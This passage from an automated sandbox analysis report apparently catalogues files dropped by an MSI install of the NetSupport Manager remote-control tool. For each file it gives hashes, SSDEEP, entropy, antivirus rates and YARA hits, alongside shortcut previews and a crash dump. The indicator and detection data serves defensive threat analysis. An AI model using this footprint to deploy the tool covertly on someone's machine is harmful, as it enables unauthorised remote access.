                                                                                                                    SHA-256:ACA860C6121287876582D3FACA1D120B0B92DA220A537220AC4A352828DAEFB3
                                                                                                                    SHA-512:B9B57B719EFD5E8F47837FA18B4D4C8E952D962281A09F16B4CE494AB38B851DAC305402C1873FCE41B602B79FE17473EF785D5635B3E5967DBD3D7480CA1357
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):164832
                                                                                                                    Entropy (8bit):6.897162199883277
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:AMAlhDScGgKqqrccIPaldpZOWCFheHzS7whb1cVeEj5eijd:cfDiWqO9o9Keeei
                                                                                                                    MD5:9324FCA454B0112B4DD12450FD3DAD1C
                                                                                                                    SHA1:8AE28F336B602FCB3ED8E83272DD27D622C50A65
                                                                                                                    SHA-256:3C1FA4D5AFC3996517990D3C36CBBD5BE1939007123F5CA288B3B64CEBC1FC7D
                                                                                                                    SHA-512:03DA719A40D656130B2D849A3AE689B035C2CA75EB8BADC4EDAF27CC7548DDDB3E923D530ECA28E0B8E94A8984B4F977829339573490489BA670DEC36D11F966
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):632288
                                                                                                                    Entropy (8bit):6.835333969996357
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:mKM5hHCLsEy4GJNo7Tff0eKsrdKvaj3IzWGLqD9AFPOy0EuEIBy14sYMwWiy8BaR:mKwhHCLsEy+EeKsUvUvGLkqD0ab47MVF
                                                                                                                    MD5:FEE6C10F16BB7A3DC448BF8111386867
                                                                                                                    SHA1:50864E624F0DB04B22C9D418D55AE2413FBEDF42
                                                                                                                    SHA-256:488772E8649C350CD950DCF847786293034371208C297E1E151CF17BF384DD2F
                                                                                                                    SHA-512:557E0FF6CA34353A30B0F77585905648FA0C1C0824367B0EBDDFC9DA5B57CA7952AA23AEED961EF0163A4A87CE8C267C47050614A74BBB66148E82F8094335D4
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):56288
                                                                                                                    Entropy (8bit):5.934323135362062
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:j8OV1u6Jr2pe/6QHDHf/ckSCr2pe/DryHDHf/ckI:jRee/RjHpee/KjH0
                                                                                                                    MD5:5758E67FBD1984B6E43648C8568FB4EE
                                                                                                                    SHA1:6C1CD32D27EA2719668FE1ADEBDD8AF626814007
                                                                                                                    SHA-256:2723D3EC822F369E1C083085335C86D9FD94367DDF36BB2047BBCE0DAE59AA7D
                                                                                                                    SHA-512:C3743E4499509E384E00C14C0C5467A0C2F337201C868A1426010F5A086F3B5C74A4E97D006042835902E0332D2833FCCD30ECFA9DD8D17F3AB109976B5AC6B1
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2976736
                                                                                                                    Entropy (8bit):7.559871297074836
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:tl4QLOK6L9jK36nyJrqfz2BJ24PomOTLuXUddgoo4J2:tl4W6L9jO6oGKBJqLuXUAojJ2
                                                                                                                    MD5:62629F14DF2B43A013EA9FE115CBB008
                                                                                                                    SHA1:35F7220685F4A32AA43A43A382C9D4523F6C5D0C
                                                                                                                    SHA-256:D617C40A780E21CDBE062C305370655437F5CBF5FF4F84D09E4FCC3F81133561
                                                                                                                    SHA-512:B95360929507CCF02B90362AD42042546F4B992831F551EA17DCEBF8BC7C5FC7F0604013C5781A3B5442AEA3B56B4B105BF3651EA0A0B0568F4BBD1677398D6F
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):44576
                                                                                                                    Entropy (8bit):5.569926928492802
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:kFPPr2pe/b2ZHDHf/ckwlp6r2pe/ijHDHf/ckm:khDee/YjHUCee/ejHS
                                                                                                                    MD5:2FF563D9CF8AFABBADF04009667B0FFF
                                                                                                                    SHA1:335EE10CC1A6B52219EFDC6B765A4820594BF928
                                                                                                                    SHA-256:D9F1FD8CAEE025BBC4193B9F2637E8577D51DE3129C5E9541B6CBDC02B4F98E6
                                                                                                                    SHA-512:26948D04ED4920FF9A77CCB8A2333038F7EEF0F59E8889A2B6DAE34350537A22C0D687F7F2EA2DB5B1AF8DCDB120EBBB683801FF8C026BC42DC167B22001E964
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2891744
                                                                                                                    Entropy (8bit):6.679546690054984
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:dbpvdeyqfF2Mbwnij1QdEdJh2skJxwj934JFCb4l5uUPyWWuDQIlF7zePcFtFc6R:d98fdbwniqdEfh2skJxwj934FCb88UP3
                                                                                                                    MD5:F7642B7DE834924F1470830D214D9D53
                                                                                                                    SHA1:C816AA12D0E64D6B89AF134D4EE8339FB547E502
                                                                                                                    SHA-256:D4083381EA6F1364137F5F7DEF093CEF5554718F37299B0A8832BE622F0F74C6
                                                                                                                    SHA-512:5E128EBD6392A84715E18C405E8502E0B5DAC2DDE64F88919911F854F2C60A8AE1FC24FFF3429270960564882D18471104E66DF68267D1C5F7374732F44B8BD2
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2934240
                                                                                                                    Entropy (8bit):6.695777901099138
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:lp3sVlUmDVC4SxoOQnIfZVuLDo1f80nW2rzVtn11wZRNMobc2QSBa4sHsYbf5f5e:iUmDvbO1fZVeDo1f80nW2rzVmZnMClQu
                                                                                                                    MD5:0830B115A3595DBB15A5C153AA17DB44
                                                                                                                    SHA1:1B3D19542C25E74E95024F2EBA1F5C3373316AB2
                                                                                                                    SHA-256:FCF7B187FF10860C26CBF999C726475C3E12CE27D7CA3D70388AA25B286D4C1E
                                                                                                                    SHA-512:D22DDFFF15A0654DBD7B49B7255EB8BB01C4D3EA149DC3B586468CCA4447940C249319664CA68BBAC07857D5BBEDBCC02D7AC62B0C432763EEC2AE399AA5225B
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):92640
                                                                                                                    Entropy (8bit):6.734732819126988
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:cqDAGQoJ0iJ0FG6C2uIHI5oskMfzNUbImR4NB+iOfGdVUdTee/njHlee/RjHV:BPQoLJnl2umI5osrzibImR4NBjOfGdVm
                                                                                                                    MD5:05835B95CA60D3B36412E006AD2FDD0E
                                                                                                                    SHA1:1D558CBE48BF0C5FB91C62E02A09201A0C6A406A
                                                                                                                    SHA-256:35B518AE2E1BBE963F9CD996A566C00A6825B52A01A08AF52B642363B33B96BE
                                                                                                                    SHA-512:AF28C3631627246C022515339D5C3B6A62D0B83C5CB54F918DF3EA88ED6439BF5E8BABC2E92EE105EDF31394E97948D8F87D44F7C9DBFD9EE3984023A14EE383
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                    File Type:Mini DuMP crash report, 12 streams, Sat Nov 23 01:38:42 2024, 0x200000 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):405674
                                                                                                                    Entropy (8bit):2.439820589258604
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:976gvKHMcFQkcEl1Vw0J2A4bEowjmlJ3l6sLcn:hpKHMWjcYJJtowClJ3l6sI
                                                                                                                    MD5:7096ACD884DF8AC53721E984B4C50E6E
                                                                                                                    SHA1:D50DD83E2EB6454C1065728AFA25E7B8E2B42698
                                                                                                                    SHA-256:F60003CA98976E280A4EF9672C2F9C17EB6C9686AD8B1CE907CA5922F41ADD95
                                                                                                                    SHA-512:9FD788B7D6FA4C1CB006707E8EF2099ACA1085FE1FE076B24BCC6748929B7CBE81AA8C863EEA8E97643F07BDDE0213464796858DD24EFEAD6E139DCEC33CC294
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\Support\client32.1_2024_11_22_203841_080.dmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):471008
                                                                                                                    Entropy (8bit):6.6933780240823175
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:7+MEmCOirSwXCHVs5QroHNgstVJ9lf8Mu3qyPKLK/:7+MEp5IsV4Mu6yPK4
                                                                                                                    MD5:0F0C9E34BABB2BA2036E9A4CD4F70FEB
                                                                                                                    SHA1:5EFB10AFCA796CC5699A79AB49FF56AC92BEDE25
                                                                                                                    SHA-256:BE063E964439510E9303BF0CC03E5CDA3169A5E115609519A608D1BF05705EA5
                                                                                                                    SHA-512:C4716B2BBFBC92C6D39013911DF923EDF2EAB7C460193EB8C3BC121E5EC58850E54E8E3B4C8B71FCD4FEBC308FABDA65AE2A91BED10006029CD40F6DB504B960
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):206304
                                                                                                                    Entropy (8bit):6.814671479498648
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:mCAq0fb1suXPEToF+HauQ0wpiEAOseIeN:PiRsu8ToEHnQ0wC8xN
                                                                                                                    MD5:A314D8185FCEF3D4B3B01542991B8AF4
                                                                                                                    SHA1:CCE615B170CED2D4C15D073EF0F60D1FA83FC845
                                                                                                                    SHA-256:04C0240CA1F248472CB080E873B88BF79F60E5894B1118DCC8DAB33A13C505A1
                                                                                                                    SHA-512:9F6DC292AA94D4579EE9949DA4E68693B2CE21F43D77CF8F9AEA09E7F40CF16F0C131F29DAB9AE78A9D059F076BFF65C95D20A971AEE7E7E651F55376A0132C5
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):45536
                                                                                                                    Entropy (8bit):7.0739520347335105
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:uPReRnverIpOBvrs+onaJQJdTFc/4BdOnDhdHu4quUr2pe/CjSHDHf/ckY4r2pe8:sR6verIpyvrFo6Q9c/EdOnXu410ee/CL
                                                                                                                    MD5:E36489E8AACE1404DC78794A10E3458A
                                                                                                                    SHA1:CD49AE49F2DF49915BA838766D803A9CBA5CCB65
                                                                                                                    SHA-256:C85614EEEE02F6CE19789B9A8259EE1CC020F6F635EC66AABB26500F0F70F653
                                                                                                                    SHA-512:3B2CAFA80B4B3F2CD83D5DB9B6E4C9E7032605E59671CAB172C11D17268D772A02B5EBB5B14490823497E221E7586D713D61FE0C6312F8FEE7514ACDC71C00DB
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):763872
                                                                                                                    Entropy (8bit):6.574853256300612
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                                                    MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                    SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                                                    SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                                                    SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1419232
                                                                                                                    Entropy (8bit):7.97986719531702
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:M3Nqv+8N7hdPgL8hKnCThLv7AEeRP/HM8Z4Sx5cTI25oWOQt:M82A7/PjACTFAEgb7bmos
                                                                                                                    MD5:F9CF2DB8B99DC50EAB538C4D860AC1A4
                                                                                                                    SHA1:B261C9E7F082EB8649AFAB9A677E022F84FD2823
                                                                                                                    SHA-256:865864A32AEE78E588764F37847522FDB0BD1940ECD73B3C49D8F68B4D5BAD71
                                                                                                                    SHA-512:59660740B58B1761A4658AEB02F669F1FD8A3FCB07C162A86B9565C5F9219CB993CC9D94B43B1D39EDCD5032B478B8A9B3A388FB82449CA82A83E3C6DD94C02D
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\Installer\MSI3FCC.tmp
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1720
                                                                                                                    Entropy (8bit):2.3227854145782407
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:8CCLDWLjKwbwG1r+LGMvO4uRQq+LGqey:8CeCjKwbwG16LGmeQzLG
                                                                                                                    MD5:5C0DD68CE0488DE7A867E429607D8A14
                                                                                                                    SHA1:383669B275B3B72A572F8D73A4A01528FFEAAB18
                                                                                                                    SHA-256:5377DBDC5FEBFAA6D3EDB2CC3DA05F63BC38E3B3D96E2A3EB6B24C8DCE6D2134
                                                                                                                    SHA-512:270853B6DB97D95BDC9F9498F6AC00C96480A4701BEF839E998F1580F42E70390B32F7EC1EE5B54E0F393C80C05DF9D1F8EEB4ABB2872E9A564C7148DD872E81
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F........................................................S....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....`.1...........NetSupport..F............................................N.e.t.S.u.p.p.o.r.t.....x.2...........NetSupport Manager..V............................................N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r..."...B.....\.....\.....\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.........%USERPROFILE%\AppData\Roaming\NetSupport\NetSupport Manager..............................................................................................................................
                                                                                                                    Process:C:\Windows\Installer\MSI3FCC.tmp
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Directory, ctime=Sat Nov 23 00:38:35 2024, mtime=Sat Nov 23 00:38:35 2024, atime=Sat Nov 23 00:38:35 2024, length=0, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1575
                                                                                                                    Entropy (8bit):3.0189266771856906
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:8KCcn9cHi19GOAoC7LGMSELGPpLDsIBm:8KTyHY9GVl7LGpELGPJsa
                                                                                                                    MD5:34F81FDAF652062EF0F7B9D36E3A528B
                                                                                                                    SHA1:FB1E0C9C771D31C6B4FBF5F9C12989FBC61DE4D4
                                                                                                                    SHA-256:18C0ABCE3DB96C17158FE59F374C9BC1952CA3FA67CA5192D2879B1EA4805B92
                                                                                                                    SHA-512:380877EEEF6ECEBAE04297679D835DE6B0E1F89D4B7AB44509D94BA4716DA2C354F340A0EAB0C906C772BD78EB26009E148D31C52FC92690768D5877A3774ACB
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F..... ....UiH=..anWiH=....UiH=..........................[....P.O. .:i.....+00.../C:\...................`.1.....wY... PROGRA~3..H......O.IwY......g.......................~.P.r.o.g.r.a.m.D.a.t.a.....^.1.....wY... NETSUP~1..F......wY..wY..............................|.N.e.t.S.u.p.p.o.r.t.....n.1.....wY... NETSUP~1..V......wY..wY..............................~.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.......[...............-.......Z..............K.....C:\ProgramData\NetSupport\NetSupport Manager..2.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.........%ProgramData%\NetSupport\NetSupport Manager.........................................................................................................................................................................................................................%.P.r.o.g.r.a.m.D.a.t.a.%.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.............................
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):19136
                                                                                                                    Entropy (8bit):6.960788331628294
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:bvmMWVghW/ivSx9YOCAs/nGfe4pBjSf+GEOWNArXVWQ4mWPQ4mqnajxcRGlPMRdk:XW2hWKSUA0GftpBjxDib4mll7PedGSk
                                                                                                                    MD5:37DA7F6961082DD96A537235DD89B114
                                                                                                                    SHA1:DAA1E2E683FA0512FF68EB686D80B4AA3B42E5B6
                                                                                                                    SHA-256:6EE46C6B6727EB77BCBCDD54DC506680CA34AF7BC7CA433B77775DE90358844E
                                                                                                                    SHA-512:AF4F28E3319344D2E215F56026E9CEE5C951B5C44374C7EEEA6790D18F174D7E785CEACBBF1450D5CA1D76F207B5F7B4F24674468F30BE84C6C3E90C48CE2A2C
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):6.97464085764015
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:sZWVghW/Y7l9YOCAs/nGfe4pBjSfXVJ4WNArXVWQ4mWGqnajxcRGlPMRd54kft:4W2hWQ7QA0GftpBjcqRll7PedGkft
                                                                                                                    MD5:3B3BD0AD4FEA16AB58FCAEAE4629879C
                                                                                                                    SHA1:EB175F53640FB8AC4028A7657BBF48823A535677
                                                                                                                    SHA-256:DCB9CF7E31D6772434C683353A1514F10D87D39FEAA9B3EDF3FA983B2988294C
                                                                                                                    SHA-512:F206E7F56A218A1725F212B20416210C228E60D0D3C44F9A598C93ACB10BF8A3C961B4C4D104AE0F166598BE5C5102A1FF77A39D2B70743E784F69C82FD4C730
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):6.982441576564087
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:NvW2hW+77QA0GftpBjuYvd0WrlI663Upe:NR9yi866kQ
                                                                                                                    MD5:584766DF684B2AD2A3A5B05A5B457FAC
                                                                                                                    SHA1:C207B7AEDB8D978C8320A1454331519A8365F20D
                                                                                                                    SHA-256:B15964D49A2C5219E0923137AA9028611BE81FDBDCBB0D43BB3AAA23114E401F
                                                                                                                    SHA-512:3BC7D49F997E489466858A21DAA22B397ADB8E736D7E064542ED5F73CD87B52CBD412CDEC2B4B892F9231C2562E24C8DEBAB73054E878405F2B2A022E86D26B8
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):7.00674396465633
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
                                                                                                                    MD5:906CB0C8ABA8342D552B0F37DDFD475F
                                                                                                                    SHA1:A3CD528B9C212FEA97495A557A91D638B1608418
                                                                                                                    SHA-256:582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
                                                                                                                    SHA-512:27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):22208
                                                                                                                    Entropy (8bit):6.906399541614446
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:3CYPvVX8rFTsdWVghW/VvSx9YOCAs/nGfe4pBjSfZCLWNArXVWQ4mWbmqnaj9Rlg:1PvVXfW2hW9SUA0GftpBj8yBlBRAkad
                                                                                                                    MD5:779A8B14C22E463EA535CBCA9EA84D49
                                                                                                                    SHA1:4620531D5291878C10D6E3974F240B98BC7FB4B9
                                                                                                                    SHA-256:FC0551DE11B310DFD8F3FC924F309D5E754B547FFC475CF6C3D007BB5366F148
                                                                                                                    SHA-512:08882528DF66FC582A890AD64C7F96E8F9DE56D4871A4D9B6B32E1C3FFB0C29B425F4CC893B2575F6697FFAFBB56BA84D43D602483B0470488DF823D445B84E4
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):6.98650705248822
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:7WVghWu7vSx9YOCAs/nGfe4pBjSby+ggmGWNArXVWQ42WHmMqnaj9RlS6VSyS:7W2hWmSUA0GftpBj+1bMlBRAkS3
                                                                                                                    MD5:F6D1216E974FB76585FD350EBDC30648
                                                                                                                    SHA1:F8F73AA038E49D9FCF3BD05A30DC2E8CBBE54A7C
                                                                                                                    SHA-256:348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271
                                                                                                                    SHA-512:756EE21BA895179A5B6836B75AEEFB75389B0FE4AE2AAFF9ED84F33075094663117133C810AB2E697EC04EAFFD54FF03EFA3B9344E467A847ACEA9F732935843
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):7.046229749504995
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:WUWVghW/zvSx9YOCAs/nGfe4pBjSfEtcsWNArXVWQ4mWV9QqnajxcRGlPMRd54xS:WUW2hW7SUA0GftpBjBj3ll7PedGxC/
                                                                                                                    MD5:BFB08FB09E8D68673F2F0213C59E2B97
                                                                                                                    SHA1:E1E5FF4E7DD1C902AFBE195D3E9FD2A7D4A539F2
                                                                                                                    SHA-256:6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E
                                                                                                                    SHA-512:E4F33306F3D06EA5C8E539EBDB6926D5F818234F481FF4605A9D5698AE8F2AFDF79F194ACD0E55AC963383B78BB4C9311EE97F3A188E12FBF2EE13B35D409900
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
